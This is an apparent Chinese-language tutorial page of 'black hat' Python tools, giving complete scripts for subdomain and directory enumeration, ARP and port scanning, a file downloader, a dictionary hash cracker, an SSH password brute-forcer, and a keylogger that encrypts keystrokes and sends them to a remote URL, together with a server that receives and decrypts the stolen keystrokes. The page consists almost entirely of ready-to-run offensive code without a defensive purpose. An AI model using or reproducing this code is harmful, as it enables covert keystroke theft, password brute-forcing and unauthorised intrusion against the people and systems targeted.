黑帽子工具编写(python)
- 渗透测试python代码
- 子域名扫描
- 目录扫描
- 网络扫描
- 端口扫描
- 文件下载器
- hash破解
- ssh暴力破解
- 键盘记录器
- 键盘监听解密器
渗透测试python代码
子域名扫描
# python subdomain_enumeration.py -w subdomain.txt -d baidu.com
import argparse
import requests
import concurrent.futuresdef get_word_list(file_path):with open(file_path, 'r' ,encoding='utf-8') as r:word_list = [i.strip() for i in r.readlines()]return word_listdef subdomain_enumeration(domain, word_list, thread):def subdomain_enum(sub, domain):sub_domains = f"http://{sub}.{domain}"try:requests.get(sub_domains)except requests.ConnectionError: passelse:print("Valid domain: ",sub_domains)with concurrent.futures.ThreadPoolExecutor(max_workers=int(thread)) as executor:futures = [executor.submit(subdomain_enum, sub, domain) for sub in word_list]concurrent.futures.wait(futures)if __name__ == "__main__":parser = argparse.ArgumentParser(description="subdomain enumeration")parser.add_argument("-w", "--word", help="Specify the dictionary file path", required=True)parser.add_argument("-d", "--domain", help="Specify the primary domain", required=True)parser.add_argument("-t", "--thread", help="Specify the thread number", required=False, default="20")args = parser.parse_args()word_list = get_word_list(args.word)subdomain_enumeration(args.domain, word_list, args.thread)
目录扫描
import argparse
import requests
import concurrent.futuresdef get_word_list(file_path):with open(file_path, 'r' ,encoding='utf-8') as r:word_list = [i.strip() for i in r.readlines()]return word_listdef directory_enumeration(url, word_list, prefix="", suffix="", thread="20"):def dir_enum(url, prefix, dir_str, suffix):dir_enum = f"{url}/{prefix}{dir_str}{suffix}"r = requests.get(dir_enum)if r.status_code==404: passelse:print("Valid directory:" ,dir_enum, r.status_code)url = url.rstrip("/")with concurrent.futures.ThreadPoolExecutor(max_workers=int(thread)) as executor:futures = [executor.submit(dir_enum, url, prefix, dir_str, suffix) for dir_str in word_list]concurrent.futures.wait(futures)if __name__ == "__main__":parser = argparse.ArgumentParser(description="directory enumeration")parser.add_argument("-w", "--word", help="Specify the dictionary file path", required=True)parser.add_argument("-u", "--url", help="Specify the url", required=True)parser.add_argument("-pf", "--prefix", help="Specify the prefix", required=False, default="")parser.add_argument("-sf", "--suffix", help="Specify the suffix", required=False, default="")parser.add_argument("-t", "--thread", help="Specify the thread number", required=False, default="20")args = parser.parse_args()word_list = get_word_list(args.word)directory_enumeration(args.url, word_list, args.prefix, args.suffix, args.thread)
网络扫描
from scapy.all import Ether, ARP, srp
import argparse
import concurrent.futuresdef network_scanner(ip_range, interface, broadcastMac, thread):packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) ans, _ = srp(packet, timeout =2, iface=interface, inter=0.1)def network_scan(receive):print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))with concurrent.futures.ThreadPoolExecutor(max_workers=int(thread)) as executor:futures = [executor.submit(network_scan, receive) for _, receive in ans]concurrent.futures.wait(futures)if __name__ == "__main__":parser = argparse.ArgumentParser(description="port scaner")parser.add_argument("-i", "--ip_range", help="Specify the IP range", required=True)parser.add_argument("-I", "--interface", help="Specify the interface", required=False, default="eth0")parser.add_argument("-m", "--mac", help="Specify the broadcastMac", required=False, default="ff:ff:ff:ff:ff:ff")parser.add_argument("-t", "--thread", help="Specify the thread number", required=False, default="20")args = parser.parse_args()network_scanner(args.ip_range, args.interface, args.mac, args.thread)
端口扫描
import argparse
import sys
import socket
import concurrent.futuresdef get_port_list(port_str):port_list = []for i in port_str.replace(' ', '').split(','):if '-' in i:[port_list.append(j) for j in range(int(i[:i.find('-')]), int(i[i.find('-')+1:]) + 1)]else:port_list.append(int(i))return list(set(port_list))def probe_port(ip, port, result = 1): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5) r = sock.connect_ex((ip, port)) if r == 0: result = r sock.close() except Exception as e: pass return resultdef port_scaner(ip, port_list, thread):open_ports = []def scan(ip, port, open_ports):sys.stdout.flush() response = probe_port(ip, port) if response == 0: open_ports.append(port)with concurrent.futures.ThreadPoolExecutor(max_workers=int(thread)) as executor:futures = [executor.submit(scan, ip, port, open_ports) for port in port_list]concurrent.futures.wait(futures)return open_portsif __name__ == "__main__":parser = argparse.ArgumentParser(description="port scaner")parser.add_argument("-i", "--ip", help="Specify the IP", required=True)parser.add_argument("-p", "--port", help="Specify the port range", required=True)parser.add_argument("-t", "--thread", help="Specify the thread number", required=False, default="20")args = parser.parse_args()port_list = get_port_list(args.port)open_ports = port_scaner(args.ip, port_list, args.thread)if open_ports: print ("Open Ports are: ") print (sorted(open_ports)) else: print ("Looks like no ports are open :(")
文件下载器
import argparse
import requestsdef file_downloader(url,save_path):r = requests.get(url, allow_redirects=True)open(save_path, 'wb').write(r.content)if __name__ == "__main__":parser = argparse.ArgumentParser(description="file downloader")parser.add_argument("-u", "--url", help="Specify the download URL", required=True)parser.add_argument("-s", "--save", help="Specify the file save path", required=True)args = parser.parse_args()file_downloader(args.url, args.save)
hash破解
import argparse
import hashlibdef get_hash_type_object(hash_type):if hash_type == "md5":return hashlib.md5if hash_type == "sha1":return hashlib.sha1if hash_type == "sha224":return hashlib.sha224if hash_type == "sha256":return hashlib.sha256if hash_type == "sha384":return hashlib.sha384if hash_type == "sha512":return hashlib.sha512def hash_cracker(hash, word_list_path, hash_mode):with open(word_list_path, 'r') as file:for line in file.readlines():hash_ob = get_hash_type_object(hash_mode)(line.strip().encode())hashed_pass = hash_ob.hexdigest()if hashed_pass == hash:print('Found cleartext input! ' + line.strip())exit(0)if __name__ == "__main__":parser = argparse.ArgumentParser(description="hash cracker")parser.add_argument("-w", "--word", help="Specify the download URL", required=True)parser.add_argument("-hs", "--hash", help="Specify the file save path", required=True)parser.add_argument("-t", "--type", help="Specify the hash type(md5,sha1,sha224,sha256,sha384,sha512)", required=True)args = parser.parse_args()hash_cracker(args.hash, args.word, args.type)
ssh暴力破解
import argparse
import paramiko
import concurrent.futuresdef ssh_connect(ip, port, username, password, code=0):ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())try:ssh.connect(ip, port=port, username=username, password=password)except paramiko.AuthenticationException:code = 1ssh.close()return codedef get_word_list(file_path):with open(file_path, 'r' ,encoding='utf-8') as r:word_list = [i.strip() for i in r.readlines()]return word_listdef ssh_brute_forcing(ip, user, passwd_list, port, thread):def try_connect(ip, username, password, port):try:response = ssh_connect(ip, port, username, password)if response == 0:print('password found: '+ password)exit(0)except Exception as e:print(e)passwith concurrent.futures.ThreadPoolExecutor(max_workers=int(thread)) as executor:futures = [executor.submit(try_connect, ip, user, passwd, port) for passwd in passwd_list]concurrent.futures.wait(futures)if __name__ == "__main__":parser = argparse.ArgumentParser(description="port scaner")parser.add_argument("-i", "--ip", help="Specify the IP", required=True)parser.add_argument("-u", "--username", help="Specify the username", required=True)parser.add_argument("-pf", "--password_file", help="Specify the password file path", required=True)parser.add_argument("-p", "--port", help="Specify the port", required=False, default="22")parser.add_argument("-t", "--thread", help="Specify the thread number", required=False, default="1")args = parser.parse_args()password_list = get_word_list(args.password_file)ssh_brute_forcing(args.ip, args.username, password_list, args.port, args.thread)
键盘记录器
import argparse
import requests
import keyboard
import hashlib
import base64
from cryptography.fernet import Fernetclass keyboard_class:def __init__(self, save_file_path="", url="", request_type="get", passwd="1234567812345678"):self.base_str = "12345678900987654321abccba"self.save_file_path = save_file_pathself.url = urlself.request_type = request_typeself.passwd = passwdself.binary_passwd = self.get_passwd()self.aes = Fernet(self.binary_passwd)def get_passwd(self):byte1 = hashlib.sha256(self.base_str.encode()).hexdigest().encode('utf-8')byte2 = hashlib.sha256(self.passwd.encode()).hexdigest().encode('utf-8')byte3 = bytes(a ^ b for a, b in zip(byte1, byte2))byte4 = hashlib.sha1(byte1 + byte2 + byte3).hexdigest().encode('utf-8')byte5 = bytes((a ^ b) ^ (c ^ d) for a, b, c, d in zip(byte1, byte2, byte3, byte4))return base64.b64encode(byte5[:32])def encrypt(self, encrypt_str):return base64.b64encode(self.aes.encrypt(encrypt_str.encode('utf-8'))).decode('utf-8')def call(self, x):try:if self.save_file_path != "":with open(self.save_file_path, 'a+', encoding='utf-8') as a:a.write(self.encrypt(x.name) + '\n')if self.url != "":if self.request_type.upper() == "POST":requests.post(self.url, headers={'tokenID': f'{self.encrypt(x.name)}'}, data={}, verify=False)else:requests.get(self.url, params={'tokenID': f'{self.encrypt(x.name)}'}, verify=False)except Exception:passdef start(self):keyboard.on_press(self.call)keyboard.wait()if __name__ == "__main__":parser = argparse.ArgumentParser(description="Keyloggers")parser.add_argument("-u", "--url", help="Specify the download URL", required=False, default="")parser.add_argument("-s", "--save", help="Specify the file save path", required=False, default="")parser.add_argument("-p", "--passwd", help="Specify the password ", required=False, default="1234567812345678")parser.add_argument("-rt", "--request_type", help="Specify the request type ", required=False, default="")args = parser.parse_args()keyboard_class = keyboard_class(args.save, args.url, args.request_type, args.passwd)keyboard_class.start()
键盘监听解密器
import argparse
import keyboard
import hashlib
import base64
from cryptography.fernet import Fernet
from fastapi import FastAPI, Request, Query
from pydantic import BaseModel
from typing import Optional
import loggingclass keyboard_class:def init(self, read_file_path="", save_file_path="decrypt.txt", ip="", port="", passwd="1234567812345678"):self.base_str = "12345678900987654321abccba"self.read_file_path = read_file_pathself.save_file_path = save_file_pathself.ip = ipself.port = portself.passwd = passwdself.binary_passwd = self.get_passwd()self.aes = Fernet(self.binary_passwd)def get_passwd(self):byte1 = hashlib.sha256(self.base_str.encode()).hexdigest().encode('utf-8')byte2 = hashlib.sha256(self.passwd.encode()).hexdigest().encode('utf-8')byte3 = bytes(a ^ b for a, b in zip(byte1, byte2))byte4 = hashlib.sha1(byte1 + byte2 + byte3).hexdigest().encode('utf-8')byte5 = bytes((a ^ b) ^ (c ^ d) for a, b, c, d in zip(byte1, byte2, byte3, byte4))return base64.b64encode(byte5[:32])def decrypt(self, decrypt_str):return self.aes.decrypt(base64.b64decode(decrypt_str)).decode('utf-8')def decrypt_file(self):with open(self.read_file_path, 'r', encoding='utf-8') as r:with open(self.save_file_path, 'w', encoding='utf-8') as w:for i in [i.strip() for i in r.readlines()]:w.write(self.decrypt(i) + '\n')def decrypt_write(self,decrypt_string):with open(self.save_file_path, 'a+', encoding='utf-8') as w:w.write(self.decrypt(decrypt_string) + '\n')def stat_listen(self):app = FastAPI()logging.getLogger().handlers = []class TokenData(BaseModel):tokenID: str@app.api_route("/", methods=["GET", "POST"])async def api_route(request: Request, tokenID: Optional[str] = Query(None)):try:if request.method == "GET":if tokenID:self.decrypt_write(tokenID)return elif request.method == "POST":tokenID = request.headers.get("tokenID")self.decrypt_write(tokenID)returnexcept Exception as e:print(e)returnimport uvicornuvicorn.run(app, host=self.ip, port=self.port)if __name__ == "__main__":parser = argparse.ArgumentParser(description="Keyloggers")parser.add_argument("-i", "--ip", help="Specify the Listen to IP addresses", required=False, default="")parser.add_argument("-o", "--out", help="Specify the file save path", required=False, default="decrypt.txt")parser.add_argument("-p", "--port", help="Specify the Listen to port", required=False, default="80")parser.add_argument("-P", "--passwd", help="Specify the password ", required=False, default="1234567812345678")parser.add_argument("-f", "--file", help="Specify the decrypt file path", required=False, default="")args = parser.parse_args()keyboard = keyboard_class()if args.file != "":keyboard.init(read_file_path=args.file, save_file_path=args.out, passwd=args.passwd)keyboard.decrypt_file()if args.ip != "":keyboard.init(save_file_path=args.out, ip=args.ip, port=args.port, passwd=args.passwd)keyboard.stat_listen()